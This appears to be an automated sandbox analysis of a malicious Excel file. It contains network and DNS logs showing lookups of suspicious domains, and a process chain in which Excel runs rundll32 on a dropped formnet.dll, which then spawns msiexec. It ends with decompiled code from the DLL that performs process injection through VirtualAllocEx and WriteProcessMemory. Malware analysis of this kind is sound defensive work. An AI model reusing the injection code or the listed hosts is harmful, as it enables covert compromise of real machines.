Jan 26, 2021 21:31:57.405497074 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.405550957 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.405572891 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.405617952 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.405622959 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.405657053 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.405669928 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.405699015 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.405704975 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.405730963 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.405739069 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.405783892 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.406435013 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.406477928 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.406490088 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.406516075 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.406543970 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.406553984 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.406577110 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.406591892 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.406598091 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.406635046 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.406640053 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.406687975 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.407376051 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.407392979 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.408689022 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.408701897 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.454165936 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.454200983 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.454220057 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.454236031 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.454339981 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.454363108 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.454379082 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.454386950 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.454392910 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.454411030 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.454421997 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.454432964 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.454447031 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.454456091 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.454472065 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.454497099 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.454564095 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.455353022 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.455378056 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.455398083 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.455421925 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.455435038 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.455444098 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.455446959 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.455461025 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.455465078 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.455483913 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.455507040 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.456021070 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.456271887 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.456300974 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.456321955 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.456324100 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.456342936 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.456347942 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.456367970 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.456377029 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.456389904 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.456403971 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.456425905 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.457221985 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.457252026 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.457273960 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.457284927 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.457294941 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.457310915 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.457315922 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.457334995 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.457335949 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.457357883 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.457381964 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.458208084 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.458242893 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.458264112 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.458266020 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.458286047 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.458288908 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.458302021 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.458311081 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.458318949 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.458332062 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.458336115 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.458365917 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.459161043 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.459194899 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.459216118 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.459223986 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.459238052 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.459238052 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.459255934 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.459259987 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.459270000 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.459284067 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.459290981 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.459319115 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.460072041 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.460102081 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.460128069 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.460143089 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.460344076 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:32:29.472558975 CET	49168	443	192.168.2.22	172.67.200.147
Jan 26, 2021 21:32:29.494952917 CET	443	49168	172.67.200.147	192.168.2.22
Jan 26, 2021 21:32:29.495028019 CET	49168	443	192.168.2.22	172.67.200.147
Jan 26, 2021 21:32:29.519736052 CET	49168	443	192.168.2.22	172.67.200.147
Jan 26, 2021 21:32:29.542633057 CET	443	49168	172.67.200.147	192.168.2.22
Jan 26, 2021 21:32:29.548872948 CET	443	49168	172.67.200.147	192.168.2.22
Jan 26, 2021 21:32:29.548939943 CET	49168	443	192.168.2.22	172.67.200.147
Jan 26, 2021 21:32:29.548986912 CET	443	49168	172.67.200.147	192.168.2.22
Jan 26, 2021 21:32:29.549031973 CET	49168	443	192.168.2.22	172.67.200.147
Jan 26, 2021 21:32:29.557076931 CET	49168	443	192.168.2.22	172.67.200.147
Jan 26, 2021 21:32:29.581564903 CET	443	49168	172.67.200.147	192.168.2.22
Jan 26, 2021 21:32:29.582020998 CET	443	49168	172.67.200.147	192.168.2.22
Jan 26, 2021 21:32:29.582087040 CET	49168	443	192.168.2.22	172.67.200.147
Jan 26, 2021 21:32:29.940510035 CET	49168	443	192.168.2.22	172.67.200.147
Jan 26, 2021 21:32:29.964488983 CET	443	49168	172.67.200.147	192.168.2.22
Jan 26, 2021 21:32:30.352916956 CET	443	49168	172.67.200.147	192.168.2.22
Jan 26, 2021 21:32:30.352958918 CET	443	49168	172.67.200.147	192.168.2.22
Jan 26, 2021 21:32:30.353195906 CET	49168	443	192.168.2.22	172.67.200.147
Jan 26, 2021 21:32:30.369800091 CET	49168	443	192.168.2.22	172.67.200.147
Jan 26, 2021 21:32:30.391000986 CET	443	49168	172.67.200.147	192.168.2.22
Jan 26, 2021 21:32:30.469187021 CET	49169	443	192.168.2.22	104.21.60.169
Jan 26, 2021 21:32:30.484596014 CET	443	49169	104.21.60.169	192.168.2.22
Jan 26, 2021 21:32:30.484690905 CET	49169	443	192.168.2.22	104.21.60.169
Jan 26, 2021 21:32:30.485943079 CET	49169	443	192.168.2.22	104.21.60.169
Jan 26, 2021 21:32:30.501491070 CET	443	49169	104.21.60.169	192.168.2.22
Jan 26, 2021 21:32:30.505618095 CET	443	49169	104.21.60.169	192.168.2.22
Jan 26, 2021 21:32:30.505657911 CET	443	49169	104.21.60.169	192.168.2.22
Jan 26, 2021 21:32:30.505708933 CET	49169	443	192.168.2.22	104.21.60.169
Jan 26, 2021 21:32:30.505748987 CET	49169	443	192.168.2.22	104.21.60.169
Jan 26, 2021 21:32:30.522988081 CET	49169	443	192.168.2.22	104.21.60.169
Jan 26, 2021 21:32:30.538546085 CET	443	49169	104.21.60.169	192.168.2.22
Jan 26, 2021 21:32:30.541513920 CET	443	49169	104.21.60.169	192.168.2.22
Jan 26, 2021 21:32:30.541611910 CET	49169	443	192.168.2.22	104.21.60.169
Jan 26, 2021 21:32:30.553380013 CET	49169	443	192.168.2.22	104.21.60.169
Jan 26, 2021 21:32:30.568494081 CET	443	49169	104.21.60.169	192.168.2.22
Jan 26, 2021 21:32:31.287504911 CET	443	49169	104.21.60.169	192.168.2.22
Jan 26, 2021 21:32:31.287554026 CET	443	49169	104.21.60.169	192.168.2.22
Jan 26, 2021 21:32:31.287802935 CET	49169	443	192.168.2.22	104.21.60.169
Jan 26, 2021 21:32:31.293575048 CET	49169	443	192.168.2.22	104.21.60.169
Jan 26, 2021 21:32:31.308815002 CET	443	49169	104.21.60.169	192.168.2.22
Jan 26, 2021 21:32:31.402179956 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:32:31.423316956 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:32:31.423445940 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:32:31.425564051 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:32:31.448390961 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:32:31.456850052 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:32:31.456872940 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:32:31.456918955 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:32:31.456952095 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:32:31.472268105 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:32:31.495116949 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:32:31.495229006 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:32:31.495309114 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:32:31.517040968 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:32:31.540011883 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:32:31.964786053 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:32:31.964837074 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:32:31.964996099 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:32:31.969952106 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:32:31.991010904 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:33:56.085762024 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:33:56.108517885 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:33:56.108728886 CET	49167	443	192.168.2.22	172.67.150.228

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 21:31:56.141288996 CET	52197	53	192.168.2.22	8.8.8.8
Jan 26, 2021 21:31:56.157478094 CET	53	52197	8.8.8.8	192.168.2.22
Jan 26, 2021 21:32:29.435168982 CET	53099	53	192.168.2.22	8.8.8.8
Jan 26, 2021 21:32:29.451072931 CET	53	53099	8.8.8.8	192.168.2.22
Jan 26, 2021 21:32:30.448050976 CET	52838	53	192.168.2.22	8.8.8.8
Jan 26, 2021 21:32:30.467240095 CET	53	52838	8.8.8.8	192.168.2.22
Jan 26, 2021 21:32:31.318912029 CET	61200	53	192.168.2.22	8.8.8.8
Jan 26, 2021 21:32:31.397614956 CET	53	61200	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 26, 2021 21:31:56.141288996 CET	192.168.2.22	8.8.8.8	0x1168	Standard query (0)	rnollg.com	A (IP address)	IN (0x0001)
Jan 26, 2021 21:32:29.435168982 CET	192.168.2.22	8.8.8.8	0xdda9	Standard query (0)	gadgetswolf.com	A (IP address)	IN (0x0001)
Jan 26, 2021 21:32:30.448050976 CET	192.168.2.22	8.8.8.8	0xe9ad	Standard query (0)	homesoapmolds.com	A (IP address)	IN (0x0001)
Jan 26, 2021 21:32:31.318912029 CET	192.168.2.22	8.8.8.8	0xb0d5	Standard query (0)	govemedico.tk	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 26, 2021 21:31:56.157478094 CET	8.8.8.8	192.168.2.22	0x1168	No error (0)	rnollg.com	172.67.150.228	A (IP address)	IN (0x0001)
Jan 26, 2021 21:31:56.157478094 CET	8.8.8.8	192.168.2.22	0x1168	No error (0)	rnollg.com	104.21.11.254	A (IP address)	IN (0x0001)
Jan 26, 2021 21:32:29.451072931 CET	8.8.8.8	192.168.2.22	0xdda9	No error (0)	gadgetswolf.com	172.67.200.147	A (IP address)	IN (0x0001)
Jan 26, 2021 21:32:29.451072931 CET	8.8.8.8	192.168.2.22	0xdda9	No error (0)	gadgetswolf.com	104.21.44.135	A (IP address)	IN (0x0001)
Jan 26, 2021 21:32:30.467240095 CET	8.8.8.8	192.168.2.22	0xe9ad	No error (0)	homesoapmolds.com	104.21.60.169	A (IP address)	IN (0x0001)
Jan 26, 2021 21:32:30.467240095 CET	8.8.8.8	192.168.2.22	0xe9ad	No error (0)	homesoapmolds.com	172.67.198.109	A (IP address)	IN (0x0001)
Jan 26, 2021 21:32:31.397614956 CET	8.8.8.8	192.168.2.22	0xb0d5	No error (0)	govemedico.tk	104.21.73.69	A (IP address)	IN (0x0001)
Jan 26, 2021 21:32:31.397614956 CET	8.8.8.8	192.168.2.22	0xb0d5	No error (0)	govemedico.tk	172.67.158.184	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 26, 2021 21:31:56.230457067 CET	172.67.150.228	443	192.168.2.22	49167	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:31:56.230457067 CET	172.67.150.228	443	192.168.2.22	49167	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:32:29.548986912 CET	172.67.200.147	443	192.168.2.22	49168	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:32:29.548986912 CET	172.67.200.147	443	192.168.2.22	49168	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:32:30.505657911 CET	104.21.60.169	443	192.168.2.22	49169	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:32:30.505657911 CET	104.21.60.169	443	192.168.2.22	49169	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:32:31.456872940 CET	104.21.73.69	443	192.168.2.22	49170	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Thu Jan 14 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Fri Jan 14 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:32:31.456872940 CET	104.21.73.69	443	192.168.2.22	49170	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2260 Parent PID: 584

General

Start time:	21:31:40
Start date:	26/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fbe0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2464 Parent PID: 2260

General

Start time:	21:31:46
Start date:	26/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Imagebase:	0xff4d0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2364 Parent PID: 2464

General

Start time:	21:31:46
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Imagebase:	0x390000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msiexec.exe PID: 2416 Parent PID: 2364

General

Start time:	21:32:14
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe
Imagebase:	0x510000
File size:	73216 bytes
MD5 hash:	4315D6ECAE85024A0567DF2CB253B7B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 2364 Parent PID: 2464 rundll32.exeCOMMON

Executed Functions

Function 0233AE40, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 372
injectionmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0233AE40(void* __eflags) {
				void* _v20;
				void* _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				struct _PROCESS_INFORMATION _v68;
				void* _v72;
				intOrPtr _v110;
				char _v111;
				char _v125;
				signed int _v129;
				char _v130;
				void* _v134;
				char _v135;
				intOrPtr _v139;
				void _v140;
				char _v155;
				char _v179;
				void* _v712;
				char _v896;
				char _v1416;
				void* __ebx;
				void* __edi;
				void* _t76;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t94;
				int _t97;
				void* _t100;
				void* _t104;
				signed int _t107;
				int _t109;
				void* _t111;
				void _t112;
				void* _t119;
				int _t121;
				intOrPtr* _t123;
				int _t126;
				long _t128;
				int _t129;
				int _t136;
				void* _t137;
				signed int _t139;
				signed int _t148;
				void* _t150;
				struct _STARTUPINFOA* _t151;
				long _t152;
				void* _t153;
				CONTEXT* _t155;
				signed int _t157;
				void* _t159;
				signed int _t172;
				void* _t177;
				CHAR* _t178;
				long _t180;
				intOrPtr _t182;
				void* _t184;
				signed int _t185;
				void* _t196;
				void* _t207;
				signed int _t241;

				_t226 = __eflags;
				E023345B0(_t76, _t159, _t177, __eflags); // executed
				E02336C20(_t159, _t177, __eflags);
				E02336530(_t159, _t177, _t226);
				E02338660(_t159, _t177, _t226);
				E023378D0(_t159, _t177, _t226);
				E023366E0(_t159, _t177, _t226);
				_t188 = 0xffffffff;
				if(E0233D670() == 0) {
					return 0xffffffff;
				}
				E0234B180();
				_t228 =  *0x23537b0;
				if( *0x23537b0 == 0) {
					L19:
					E0233BF50(_t243, 0, E02339D50(0x638d6cbf));
					ExitProcess(0);
				}
				_t89 = E0233BF50(_t228, 0, E02339D50(0x6bae8bdb));
				_t196 = _t196 + 0xc;
				_t188 =  &_v1416;
				 *_t89( *0x23537b0,  &_v1416, 0x104);
				_t91 =  *0x23537b0; // 0x2330000
				_t229 = _t91;
				_v32 = _t91;
				if(_t91 == 0) {
					goto L19;
				}
				_t151 =  &_v140;
				E02348F20(_t151, 0x44);
				_v140 = 0x44;
				_t94 = E0233D0A0( &_v179, 0x2350b1b,  &_v179);
				_t178 =  &_v896;
				E0233C560(_t178, _t94, 0xffffffff);
				E0233BF50(_t229, 0, 0x1e16041);
				_t196 = _t196 + 0x24;
				_t97 = CreateProcessA(0, _t178, 0, 0, 0, 4, 0, 0, _t151,  &_v68); // executed
				_t230 = _t97 - 1;
				if(_t97 != 1) {
					goto L19;
				}
				_t152 = E0233A820(_v32);
				E0233BF50(_t230, 0, 0x8cae838);
				_t196 = _t196 + 0xc;
				_t100 = VirtualAllocEx(_v68.hProcess, 0, _t152, 0x3000, 4); // executed
				_t231 = _t100;
				if(_t100 == 0) {
					goto L19;
				}
				 *0x2352ca8 = _t100;
				_v24 = _t100;
				E0234FA60(_t178, _t231,  &_v1416);
				E023490E0(_t178);
				E0234FB20(_t178);
				_t104 = E02339D80(_v32, _t152); // executed
				_t188 = _t104;
				E02344660(_t104, _v32);
				E02339550(_t152, _t177, _v32, _t231, _t188, _v24);
				_t207 = _t196 + 0x1c;
				_t107 = E023476C0(_t231);
				_t180 = _t152;
				_v48 = _t107;
				if(_t152 == 0) {
					L8:
					_v28 = 0;
					E0233BF50(_t234, 0, 0xa48b0f9);
					_t196 = _t207 + 8;
					_t109 = WriteProcessMemory(_v68.hProcess, _v24, _t188, _t180,  &_v28); // executed
					_t235 = _t109 - 1;
					if(_t109 == 1) {
						_t188 = _t180;
						E0233BF50(_t235, 0, 0x8cae838);
						_t196 = _t196 + 8;
						_t111 = VirtualAllocEx(_v68.hProcess, 0, 0x42, 0x3000, 4); // executed
						_t236 = _t111;
						if(_t111 != 0) {
							_t112 = E02337DD0(0x12);
							_t153 = _v24;
							_v140 = _t112;
							_v20 = _t111;
							_v139 = _t153;
							_v135 = E02337DD0(0x15);
							_v134 = _t188;
							_v130 = 0xb8;
							_v129 = _v48;
							E0233E930( &_v125, E0234D7E0( &_v28, _t177, 0x2350962, 0xf,  &_v155), 0xe);
							_t182 = _v32;
							_v111 = 0xe9;
							E023322E0(_t236, E0233CA4E, _t182);
							_t119 = E02339D50(0x2e6222c1);
							_t184 = _v20;
							_v110 = 0xb81da7e1 - _t182 + _t153 - _t184 + _t119;
							E0233BF50(_t236, 0, 0xa48b0f9);
							_t196 = _t196 + 0x34;
							_t121 = WriteProcessMemory(_v68.hProcess, _t184,  &_v140, 0x42,  &_v28); // executed
							_t237 = _t121 - 1;
							if(_t121 == 1) {
								_v36 = _t188;
								_t155 =  &_v896;
								E02348F20(_t155, 0x2cc);
								_v896 = 0x10001;
